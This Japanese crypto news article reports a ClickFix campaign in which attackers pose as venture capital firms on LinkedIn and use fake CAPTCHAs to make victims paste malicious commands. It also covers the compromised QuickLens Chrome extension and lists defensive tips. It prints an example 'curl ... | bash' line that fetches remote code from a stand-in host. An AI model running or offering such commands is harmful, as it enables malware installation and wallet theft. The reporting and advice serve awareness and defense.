ClickFix攻撃がVCのなりすましでクリプトハッカーを直撃
ID/USDT
$3,842,597.68
$0.0446 / $0.0414
差額: $0.003200 (7.73%)
-0.0102%
ショートが支払い
目次
Moonlock Labのレポートによると、暗号通貨ハッカーがClickFix攻撃でベンチャーキャピタル企業を装い、ユーザーを標的にしている。偽のSolidBit、MegaBit、Lumax Capitalなどの企業を通じてLinkedInからパートナーシップ提案が送信され、その後偽のZoomとGoogle Meetリンクに誘導される。対象リンクをクリックすると、偽のCloudflare「私はロボットではありません」ボックスが表示され;クリックすると悪意あるコマンドがクリップボードにコピーされ、ユーザーがターミナルに貼り付けて実行するよう求められる。この方法でハッカーはセキュリティ対策を回避している;SolidBitの共同創業者として紹介されるMykhailo Hureievというアカウントが前面で活躍しているが、インフラのIDを迅速に変更している。
Mykhailo Hureievという名前のユーザーが、スキャムの初期LinkedInフェーズの主な連絡窓口だったとされる。出典: big dan
ClickFix攻撃の技術的メカニズム
ClickFixは、クリップボードポイズニング技法で動作する。偽のCAPTCHAをクリックすると、クリップボードに「curl -s https://fake-domain.sh | bash」のようなコマンドがコピーされる。ユーザーは「問題を解決する」ためにこれをターミナルに貼り付けて実行する。これにより、UACのような保護をバイパスする。なぜならコードはユーザー自身が自発的に実行するためだ。Microsoft Threat Intelligenceによると、昨年から製造、小売、政府セクターで100件以上の事例が報告されている。
偽のLinkedInアカウントとMykhailo Hureievの役割
Mykhailo Hureievアカウントは、SolidBit共同創業者として偽の提案を送っている。ハッカーはIPとドメインを数分で変更して追跡を困難にしている。LinkedInの検証不足が、暗号通貨プロフェッショナルを理想的な標的にしている。類似の戦術は、SEED詳細分析のような資産でシードフレーズ窃盗を引き起こしている。
QuickLens Chrome拡張機能ハックの詳細
同時期にQuickLens拡張機能が乗っ取られた。Annex Securityのレポートによると、7,000人のユーザーが影響を受け:暗号通貨ウォレットデータ、シードフレーズ、Gmailパスワードが盗まれた。拡張機能はClickFixでマルウェアを拡散し、Chrome Web Storeから削除された。
QuickLensはマルウェア拡散のために侵害された後、ウェブストアから削除された。出典: Annex Security
ClickFixのセクター別影響表
| セクター | 報告された使用 | 出典 |
|---|---|---|
| 製造業 | 広範 | Unit42 |
| 小売 | 中程度 | Microsoft TI |
| 政府 | 低い | Unit42 |
| 暗号通貨 | 増加中 | Moonlock Lab |
SEED投資家向けClickFixリスク分析
SEEDのようなコインでシードフレーズが盗まれると、資金全損につながる。攻撃者はVCを装ってSEED先物取引投資家を狙っている。対策:2FAを有効化、シードをハードウェアウォレットに移行、LinkedIn提案を検証、クリップボード監視ツールを使用(例: CleanClip)。
類似攻撃からの防御戦略
- 偽リンクをクリックしない;常に公式ドメインを確認。
- ターミナルコマンドを読みずに実行しない。
- 拡張機能は公式ストアからのみインストールし、権限を制限。
- 暗号通貨コミュニティで検証プロトコルを採用。